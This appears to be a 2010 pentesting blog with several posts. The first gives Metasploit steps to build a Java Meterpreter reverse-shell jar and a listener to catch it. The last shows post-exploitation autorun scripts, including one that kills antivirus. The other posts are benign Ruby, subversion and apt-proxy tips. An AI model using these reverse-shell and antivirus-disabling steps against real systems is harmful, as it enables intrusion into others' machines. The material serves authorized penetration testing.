0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Metasploit HowTo: Standalone Java Meterpreter Connect-Back

with 5 comments

Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward: generate the .jar, set up a handler, then move the .jar to your target and execute it.

Note! Nightranger’s method to do this is currently out of date (10/17/2010).

Following mihi’s instructions, create the payload:

msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on
[*] Sending stage (26938 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-10-17 17:50:29 -0500
[*] Exploit completed, but no session was created.
msf exploit(java_tester) > [*] Meterpreter session 1 closed.  Reason: Died
msf exploit(java_tester) > ls

now, set up the handler:

msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

Copy the payload to the target and run it, and you’re golden. No need to fiddle with the classpath or anything; the loader jar is self-contained.

Written by jcran

October 17, 2010 at 11:41 PM

Posted in howto, metasploit

searching ruby source code

with one comment

Contributing to open source? Need to search and understand ruby code faster? This bash function should save you some time. I use it at least 50-60 times a day.

Stick this in your .bashrc:

function rgrep() {
   # case-insensitive search for $1 in every .rb file below the current directory, following symlinks
   find -L . -type f -name \*.rb -exec grep -n -i -H --color "$1" {} \;
}

Use like: $ rgrep "something"

Written by jcran

July 19, 2010 at 4:21 PM

Posted in utility


ruby hash per-value defaults

leave a comment »

Here’s a quick tip for assigning default values with a ruby hash. It’s well publicized that you can set an overall default (I think this is called "default assignment") for the hash and read it back with the .default method, like this (taken directly from the rubydocs):

h = Hash.new                            #=> {}
h.default                               #=> nil
h.default(2)                            #=> nil

h = Hash.new("cat")                     #=> {}
h.default                               #=> "cat"
h.default(2)                            #=> "cat"

h = Hash.new {|h,k| h[k] = k.to_i*10}   #=> {}
h.default                               #=> 0
h.default(2)                            #=> 20

But you can also set per-key defaults using the or-operator. If the assigned value is false or nil, you’ll get the default value instead (note that an empty string is neither, so it is kept as-is). See below:

ruby-1.9.1-p378 > x = {}
=> value: {}
ruby-1.9.1-p378 > x[:y] = "y"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = "y" || "noty"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = nil || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = false || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = "" || "noty"
=> value: ""

… Note that or-assignment doesn’t work in this case:

ruby-1.9.1-p378 > x[:y] = "" ||= "noty"
SyntaxError: (irb):19: syntax error, unexpected tOP_ASGN, expecting $end
x[:y] = "" ||= "noty"
from /home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/irb:17:in `<main>'
ruby-1.9.1-p378 >
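As an added example (not from the original post), the following Ruby puts the three variants side by side: a hash-wide default, the per-value `value || default` idiom shown above, and the spelling of or-assignment that does parse (`x[:y] ||= "noty"`, applied to the key rather than to a literal). The `default_if_blank` helper is an assumption of mine for the empty-string case the irb session exposes.

```ruby
# Added example, not from the original post.

# 1. Hash-wide default: every missing key reads as the default, but
#    fetch ignores it and key? still reports the key as absent.
def hash_wide_default
  h = Hash.new("cat")
  [h[:a], h.fetch(:a, "missing"), h.key?(:a)]   # => ["cat", "missing", false]
end

# 2. Per-value default with ||: the right-hand side is used only when
#    the assigned value is nil or false. "" and 0 are truthy in Ruby,
#    so they are kept as-is.
def per_value_default(value)
  x = {}
  x[:y] = value || "noty"
  x[:y]
end

# 3. Or-assignment on the hash key itself. This is the form the
#    SyntaxError above was reaching for: it assigns only when x[:y]
#    is currently nil or false (a missing key counts as nil).
def or_assign(existing)
  x = { y: existing }
  x[:y] ||= "noty"
  x[:y]
end

# Hypothetical helper: also treat empty strings as "no value", which
# neither || nor ||= does on their own.
def default_if_blank(value, default)
  (value.nil? || value == false || value.to_s.empty?) ? default : value
end
```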

Written by jcran

July 19, 2010 at 4:12 PM

Posted in Uncategorized

10 min project hosting & sharing

with one comment

Need a simple way to backup (and share) local files & scripts? Yeah yeah, another svn/websvn howto – but my brain sucks, and i forget this stuff if i don’t write it down…

The only prereqs to this quick howto are that you have an ubuntu box and you know a thing or two about subversion. Preferably a shellhost – I use slicehost and i’ve heard great things about linode.com.

I use svn for many of my projects, and for my toolkit. Tonight i needed to quickly and securely share a few files from that toolkit, so i stuck websvn on a host, and configured htaccess authentication. Total time? 10 min. Here’s the setup.

(Yes, i know the cool kids are all on git now)

  • Create subversion repository in /var/svn
$ cd /var/svn
$ svnadmin create repository
  • Install apache / websvn (apt-get install)
$ apt-get install apache2 websvn
  • Configure websvn – this is handled by the debian package, so when you’re done, your config (/etc/websvn/svn_deb_conf.inc) should look like this
// please edit /etc/websvn/config.php
// or use dpkg-reconfigure websvn
$config->addRepository("repository", "file:///var/svn/repository");
  • Create htpasswd file
$ htpasswd -c -s /var/svn/htaccess testuser
  • Configure htpasswd in apache config (/etc/websvn/apache.conf)
# Configuration for websvn using php4.
Alias /websvn /usr/share/websvn
<Directory /usr/share/websvn>
  DirectoryIndex index.php
  Options FollowSymLinks
  Order allow,deny
  Allow from all
  AuthType Basic
  AuthName "Subversion Repository"
  Require valid-user
  AuthUserFile /var/svn/htaccess
  <IfModule mod_php4.c>
    php_flag magic_quotes_gpc Off
    php_flag track_vars On
  </IfModule>
</Directory>
  • Restart Apache and you’re done. Since Basic auth sends the password base64-encoded with every request, serve the vhost over HTTPS if the files you’re sharing matter.
$ /etc/init.d/apache2 restart

Written by jcran

July 13, 2010 at 6:01 AM

Posted in howto, utility

scrape scrape scrape

with 2 comments

totally half-finished thought. maybe it’ll spawn an idea for you… there’s a zillion+1 ways to scrape information from the web these days. here’s the easiest i’ve found:

require 'nokogiri'
require 'open-uri'
require 'tidy_ffi'

class CrappyScraper

	attr_accessor :doc

	# google the keyword and print the title of each result link
	def search(keyword)
		# URI.open is the open-uri entry point; keyword is url-encoded so spaces don't break the request
		@doc = Nokogiri::HTML(URI.open("http://www.google.com/search?q=" + URI.encode_www_form_component(keyword)))
		@doc.xpath('//h3/a').each do |node|
			puts node.text
		end
	end

	# fetch an arbitrary url and print the text of every link inside a span
	def scrape(url)
		@doc = Nokogiri::HTML(URI.open(url))
		@doc.xpath('//span/a').each do |node|
			puts node.text
		end
	end

	# run the fetched document through tidy and write the cleaned html
	def write_clean(filename)
		File.open(filename, 'w') do |f|
			doc_clean = TidyFFI::Tidy.new(@doc.to_s).clean
			f.write(doc_clean)
		end
	end

	# empty string until something has been fetched
	def to_s
		@doc.to_s
	end

	# write the raw fetched document as-is
	def write(filename)
		File.open(filename, 'w') { |f| f.write(@doc) }
	end
end

x = CrappyScraper.new
puts x.to_s

Written by jcran

July 12, 2010 at 2:36 PM

Posted in Uncategorized

Apt-proxy installation notes

with 6 comments

No big secret that i’m a huge fan of ubuntu as a pentesting platform, and run it as my main OS. Recently I’ve had enough systems to justify tossing in an apt-proxy installation. Nothing groundbreaking, but may save a few mins for you. Here’re my notes.


Choose an (ubuntu) machine to install apt-proxy on:

$ sudo apt-get install apt-proxy

After the install, edit the /etc/apt-proxy/apt-proxy-v2.conf file to configure your listening address:

address = [internal listening address]

Restart the apt-proxy daemon:

$ sudo /etc/init.d/apt-proxy restart

That’s it for the server


Setting a client up to use the proxy requires editing a few lines of your /etc/apt/sources.list. The Apt-proxy howto (https://help.ubuntu.com/community/AptProxy) gives a good example:

Replace mentions of specific repository URL (in /etc/apt/sources.list) with references to your server and the backend for it; such as:

deb http://archive.ubuntu.com/ubuntu karmic main restricted
deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe

would become:

deb http://server:9999/ubuntu karmic main restricted
deb http://server:9999/ubuntu-security karmic-security main restricted universe

Pretty straightforward. Just make sure you append the “-security” piece onto the proxy URL for both security and updates. In the case of my /etc/apt/sources.list:

# standard packages
deb http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic main restricted universe multiverse

# update packages
deb http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu karmic-updates main restricted universe multiverse

# security packages
deb http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse
deb-src http://[internal listening address]:9999/ubuntu-security karmic-security main restricted universe multiverse

Run an apt-get update / apt-get upgrade and you’re golden. Rinse & repeat for all clients.
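As an added example (not from the original post), here is a small Ruby script that applies the rewrite rule above to a sources.list: archive.ubuntu.com lines go to the proxy’s ubuntu backend, security.ubuntu.com lines to ubuntu-security, and anything else (comments, PPAs) is left alone so it isn’t silently broken. The proxy hostname and the sample sources.list are constructed placeholders.

```ruby
# Added example, not from the original post: rewrite stock Ubuntu
# sources.list lines to point at an apt-proxy instance.
#   archive.ubuntu.com/ubuntu  -> <proxy>:9999/ubuntu
#   security.ubuntu.com/ubuntu -> <proxy>:9999/ubuntu-security

# Upstream host/path -> apt-proxy backend name (the two default backends).
BACKENDS = {
  "archive.ubuntu.com/ubuntu"  => "ubuntu",
  "security.ubuntu.com/ubuntu" => "ubuntu-security",
}.freeze

# Rewrite one sources.list line. Comments, blank lines and lines that
# point at a host without a configured backend are returned unchanged,
# so a PPA line is not accidentally routed through a proxy that can't
# serve it.
def proxify_line(line, proxy)
  m = line.match(%r{\A(deb|deb-src)\s+http://([^/\s]+/[^\s/]+)/?\s+(.*)\z})
  return line unless m
  backend = BACKENDS[m[2]]
  return line unless backend
  "#{m[1]} http://#{proxy}:9999/#{backend} #{m[3]}"
end

# Rewrite a whole file's worth of text.
def proxify(text, proxy)
  text.lines.map { |l| proxify_line(l.chomp, proxy) }.join("\n")
end

# Constructed sample input resembling the post's sources.list, plus a
# PPA line that must survive untouched.
SAMPLE = <<~LIST
  # standard packages
  deb http://archive.ubuntu.com/ubuntu karmic main restricted universe multiverse
  deb-src http://archive.ubuntu.com/ubuntu karmic main restricted universe multiverse

  # security packages
  deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe multiverse
  deb http://ppa.launchpad.net/someppa/ubuntu karmic main
LIST

puts proxify(SAMPLE, "proxy.internal") if __FILE__ == $PROGRAM_NAME
```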


Written by jcran

July 5, 2010 at 8:21 PM

Posted in Uncategorized


Scripting Post-Exploitation

with 5 comments

A common question that comes up with post-exploitation is the need to run multiple things when a meterpreter session is initiated.

You can easily run a single command using the ‘AutoRunScript’ option. For example:

msf (psexec) > set AutoRunScript killav

However, if you need multiple things to run, there are a couple of multi-runner scripts you should know about: multiscript, multicommand, and multi_console_command. They take either a -c or a -rc option, which provides the list of items to run. These scripts were provided by dark0perator.

Sidenote: If you’re using the multi* scripts, it’s better to use the -rc option. The parsing for the multi-command scripts doesn’t handle spaces well.

msf (psexec) > set AutoRunScript multi_console_command -c 'command, command, command' ## Don't do this

It’s much better to use an external rc file where commands.rc is just a list of commands one-per-line like:

run killav

Then call it like:

msf (psexec) > set AutoRunScript multi_console_command -rc commands.rc

Another (non-recommended) trick is to set the InitialAutoRunScript option, i.e. 'set InitialAutoRunScript killav', if you only need two scripts to run – but generally InitialAutoRunScript shouldn’t be touched except by exploits. It’s intended for exploits that know the target process is going to die, so they can migrate. (Thanks to egyp7 for the info.)

Written by jcran

July 2, 2010 at 5:51 PM